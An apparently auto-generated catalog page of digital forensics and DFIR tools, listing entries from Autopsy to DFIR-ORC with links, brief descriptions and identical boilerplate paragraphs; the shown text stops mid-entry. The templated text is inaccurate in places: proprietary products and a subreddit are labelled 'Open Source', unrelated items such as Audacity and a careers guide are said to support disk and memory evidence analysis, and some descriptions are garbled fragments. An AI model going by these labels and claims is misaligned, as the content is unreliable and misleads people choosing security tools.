Open-Source Cybersecurity Tools: Digital Forensics & DFIR

← Back to Open-Source Cybersecurity Tools Hub | Full Open Source Catalog | Main Atlas

This category contains 145 documented tools. It focuses on capabilities used for timeline creation, disk and memory evidence analysis, and legal-quality reporting. Use this section when building shortlists, comparing operational tradeoffs, and mapping controls to detection/response ownership.

Category Evaluation Checklist

• Coverage depth against your highest-priority threats and compliance obligations.
• Operational overhead for deployment, tuning, and long-term maintenance.
• Signal quality versus analyst workload and false-positive pressure.
• Integration fit with SIEM, ticketing, identity, cloud, and engineering workflows.
• Governance readiness including auditability, ownership clarity, and change control.

Jump by Name

# | A | B | C | D | E | F | G | H | I | J | K | L | M | N | O | P | R | S | T | U | W | X | Z

Letter

This letter section contains 6 tools.

Autopsy

• Website: https://www.sleuthkit.org/autopsy
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Cyber Security Tools

What it does: Autopsy is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Digital forensics platform and graphical interface.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Digital Forensics.

Back to Name Jump

Caine

• Website: https://www.caine-live.net
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Cyber Security Tools, Awesome Hacking

What it does: Caine is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: CAINE is a Ubuntu-based app that offers a complete forensic environment that provides a graphical interface. This tool can be integrated into existing software tools as a module. It automatically extracts a timeline from RAM.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Linux Distributions.

Back to Name Jump

FTK Imager

• Website: https://accessdata.com/product-download/ftk-imager-version-4.2
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Cyber Security Tools

What it does: FTK Imager is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Forensic imaging tool.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Digital Forensics.

Back to Name Jump

The Sleuth Kit (TSK)

• Website: https://www.sleuthkit.org
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Cyber Security Tools

What it does: The Sleuth Kit (TSK) is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: A library and collection of command-line tools for digital forensics.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Digital Forensics.

Back to Name Jump

X1 Search

• Website: https://www.x1.com/products/x1-search
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Cyber Security Tools

What it does: X1 Search is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Forensic search and data extraction tool.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Digital Forensics.

Back to Name Jump

/r/computerforensics/

• Website: https://www.reddit.com/r/computerforensics/
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: /r/computerforensics/ is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Subreddit for computer forensics.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Resources > Other.

Back to Name Jump

Letter A

This letter section contains 11 tools.

A1 Website Download

• Website: http://www.microsystools.com/products/website-download
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome OSINT

What it does: A1 Website Download is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Download entire websites to disk.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome OSINT > ↑ Offline Browsing.

Back to Name Jump

acquirepi

• Website: https://github.com/plonxyz/acquirepi
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: acquirepi is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Successor to 4n6pi, scalable forensic disk imager, designed to run on a Raspberry Pi, powered by libewf.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Imaging.

Back to Name Jump

ALEAPP

• Website: https://github.com/abrignoni/ALEAPP
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: ALEAPP is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: An Android Logs Events and Protobuf Parser.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Mobile Forensics.

Back to Name Jump

ALEX

• Website: https://github.com/prosch88/ALEX
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: ALEX is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Extract files from ADB devices on Windows, Linux and MacOS. Mostly a wrapper for adbutils.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Acquisition.

Back to Name Jump

Andriller

• Website: https://github.com/den4uk/andriller
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: Andriller is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: A software utility with a collection of forensic tools for smartphones.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Mobile Forensics.

Back to Name Jump

APFS Fuse

• Website: https://github.com/sgan81/apfs-fuse
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: APFS Fuse is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: A read-only FUSE driver for the new Apple File System.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > OS X Forensics.

Back to Name Jump

ArtEx

• Website: https://www.doubleblak.com/index.php
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: ArtEx is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Artifact Examiner for iOS Full File System extractions.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Mobile Forensics.

Back to Name Jump

ArtifactExtractor

• Website: https://github.com/Silv3rHorn/ArtifactExtractor
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: ArtifactExtractor is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Extract common Windows artifacts from source images and VSCs.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Acquisition.

Back to Name Jump

Audacity

• Website: http://sourceforge.net/projects/audacity/
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome CTF

What it does: Audacity is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Analyze sound files (mp3, m4a, whatever).

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Solve > Forensics.

Back to Name Jump

Autopsy

• Website: http://www.sleuthkit.org/autopsy/
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Hacking, Awesome Forensics

What it does: Autopsy is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: A digital forensics platform and graphical interface to and other digital forensics tools.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Frameworks.

Back to Name Jump

Awesome Anti Forensics

• Website: https://github.com/remiflavien1/awesome-anti-forensic
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Security

What it does: Awesome Anti Forensics is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: A collection of awesome tools used to counter forensics activities.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Security > Other Awesome Lists > Other Security Awesome Lists.

Back to Name Jump

Letter B

This letter section contains 6 tools.

Beagle

• Website: https://github.com/yampelo/beagle
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: Beagle is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Transform data sources and logs into graphs.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Windows Artifacts.

Back to Name Jump

BelkaCTF

• Website: https://belkasoft.com/ctf
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: BelkaCTF is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: CTFs by Belkasoft.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Learn Forensics > CTFs and Challenges.

Back to Name Jump

Belkasoft RAM Capturer

• Website: https://belkasoft.com/ram-capturer
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: Belkasoft RAM Capturer is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Volatile Memory Acquisition Tool.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Acquisition.

Back to Name Jump

Bkhive and Samdump2

• Website: http://sourceforge.net/projects/ophcrack/files/samdump2/
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome CTF

What it does: Bkhive and Samdump2 is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Dump SYSTEM and SAM files.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Solve > Forensics.

Back to Name Jump

Blauhaunt

• Website: https://github.com/cgosec/Blauhaunt
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: Blauhaunt is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: A tool collection for filtering and visualizing logon events.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Windows Artifacts.

Back to Name Jump

bstrings

• Website: https://github.com/EricZimmerman/bstrings
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: bstrings is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Improved strings utility.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Carving.

Back to Name Jump

Letter C

This letter section contains 8 tools.

CFF Explorer

• Website: http://www.ntcore.com/exsuite.php
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome CTF

What it does: CFF Explorer is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: PE Editor.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Solve > Forensics.

Back to Name Jump

chrome-url-dumper

• Website: https://github.com/eLoopWoo/chrome-url-dumper
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: chrome-url-dumper is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Dump all local stored infromation collected by Chrome.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Internet Artifacts.

Back to Name Jump

ChromeCacheView

• Website: https://www.nirsoft.net/utils/chrome_cache_view.html
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: ChromeCacheView is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: A small utility that reads the cache folder of Google Chrome Web browser, and displays the list of all files currently stored in the cache.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Internet Artifacts.

Back to Name Jump

CobaltStrikeScan

• Website: https://github.com/Apr4h/CobaltStrikeScan
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Cybersecurity Blue Team

What it does: CobaltStrikeScan is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Scan files or process memory for Cobalt Strike beacons and parse their configuration.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Cybersecurity Blue Team > Windows-based defenses.

Back to Name Jump

Computer Aided Investigative Environment (CAINE)

• Website: https://caine-live.net/
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Cybersecurity Blue Team

What it does: Computer Aided Investigative Environment (CAINE) is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Italian GNU/Linux live distribution that pre-packages numerous digital forensics and evidence collection tools.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Cybersecurity Blue Team > Operating System distributions.

Back to Name Jump

Creddump

• Website: https://github.com/moyix/creddump
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome CTF

What it does: Creddump is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Dump windows credentials.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Solve > Forensics.

Back to Name Jump

CyberDefenders

• Website: https://cyberdefenders.org/blueteam-ctf-challenges/?type=ctf
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: CyberDefenders is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Learn Forensics > CTFs and Challenges.

Back to Name Jump

CybersecurityGuide – Digital Forensics Careers

• Website: https://cybersecurityguide.org/careers/digital-forensics/
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: CybersecurityGuide – Digital Forensics Careers is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Guide on skills, certs, and career paths in cyber forensics.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Resources > Other.

Back to Name Jump

Letter D

This letter section contains 12 tools.

dc3dd

• Website: https://sourceforge.net/projects/dc3dd/
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: dc3dd is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Improved version of dd.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Imaging.

Back to Name Jump

dcfldd

• Website: https://sourceforge.net/projects/dcfldd/
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: dcfldd is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Different improved version of dd (this version has some bugs!, another version is on github ).

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Imaging.

Back to Name Jump

DefCon CTFs

• Website: https://archive.ooo
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: DefCon CTFs is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: archive of DEF CON CTF challenges.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Learn Forensics > CTFs and Challenges.

Back to Name Jump

dexter

• Website: https://github.com/coinbase/dexter
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: dexter is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Dexter is a forensics acquisition framework designed to be extensible and secure.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Frameworks.

Back to Name Jump

dff

• Website: https://github.com/arxsys/dff
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: dff is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Forensic framework.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Frameworks.

Back to Name Jump

DFIR

• Website: https://www.sans.org/cyber-security-summit/archives/dfir
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Threat Detection

What it does: DFIR is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: , ) - Threat hunting, Blue Team and DFIR summit slides.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources.

Back to Name Jump

DFIR-ORC

• Website: https://github.com/dfir-orc
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome SOC

What it does: DFIR-ORC is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: ;.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Mission-critical means (tools/sensors) > Critical tools for CSIRT.

Back to Name Jump

Digital Forensic Challenge Images

• Website: https://www.ashemery.com/dfir.html
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: Digital Forensic Challenge Images is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Two DFIR challenges with images.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Resources > File System Corpora.

Back to Name Jump

Digital Forensics Tool Testing Images

• Website: https://sourceforge.net/projects/dftt/
